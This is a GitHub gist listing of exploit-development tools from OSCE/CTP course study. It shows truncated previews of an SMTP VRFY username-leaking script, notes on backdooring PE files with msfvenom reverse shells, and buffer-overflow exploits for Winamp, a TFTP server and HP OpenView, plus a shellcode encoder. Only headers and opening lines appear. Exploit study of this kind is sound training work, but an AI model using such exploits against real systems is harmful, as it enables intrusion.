
@fl3xu5
fl3xu5 / smtpvrfy.py
Created July 17, 2017 11:34 — forked from mgeeky/smtpvrfy.py
SMTP VRFY python tool intended to check whether SMTP server is leaking usernames.
#!/usr/bin/python
#
# Simple script intended to abuse SMTP server's VRFY command to leak
# usernames having accounts registered within it.
#
# Mariusz B., 2016
#
import socket
import sys
fl3xu5 / msfvenom-reverse-tcp-WaitForSingleObject.md
Created July 17, 2017 11:20 — forked from mgeeky/msfvenom-reverse-tcp-WaitForSingleObject.md
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for WaitForSingleObject call within modern msfvenom generated payload.


Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment and WaitForSingleObject locating and patching. It was written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching the problem of finding this particular Windows API. Since RE is one of my stronger FU's, I decided to write down my explanation of the subject.

Contents:

fl3xu5 / winamp-5.12-unc-exploit.pl
Created July 17, 2017 08:55 — forked from mgeeky/winamp-5.12-unc-exploit.pl
My version of the Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit, for the occasion of the OSCE/CTP course. Original PoC by Umesh Wanve ([email protected]).
#!/usr/bin/perl -w
# ====================================================================
# Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit
# Original Poc by Umesh Wanve ([email protected])
# Exploit crafted by Mariusz B. / mgeeky (for the occasion of OSCE/CTP, 2017)
# ====================================================================
$start = "[playlist]\r\nFile1=\\\\";
$egg = "T00WT00W";
fl3xu5 / cve2008-1611.py
Created July 17, 2017 08:53 — forked from mgeeky/cve2008-1611.py
Exploit for the CVE-2008-1611 TFTP Server 1.4 ST RRQ/WRQ packet's filename stack-based overflow with SEH overwrite.
#!/usr/bin/python
import socket
import struct
HOST = '192.168.1.100'
PORT = 69
def send_packet(filename):
#
fl3xu5 / hp-openview-exploit.py
Created July 17, 2017 08:50 — forked from mgeeky/hp-openview-exploit.py
HP OpenView NNM B.07.50 Remote Code Execution exploit with ASCII encoded egghunter, JO/JNO jump-over-SEH trick and stack aligned. Written during OSCE/CTP course.
#!/usr/bin/python
# HP OpenView NNM B.07.50 Remote Code Execution exploit
# by Mariusz B. / mgeeky, 17'
import struct
import socket
HOST = '192.168.XXX.YYY'
PORT = 7510
fl3xu5 / ascii-shellcode-encoder.py
Created July 17, 2017 08:44 — forked from mgeeky/ascii-shellcode-encoder.py
ASCII Shellcode encoder for Exploit Development purposes, utilizing Jon Erickson's subtract-arguments finding algorithm.
#!/usr/bin/python
#
# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler`
# utility (as described in: Hacking - The Art of Exploitation).
#
# Basically one feeds the program a binary encoded shellcode on its input,
# and it yields its ASCII encoded form on the output.
#
# This payload will at the beginning align the stack by firstly moving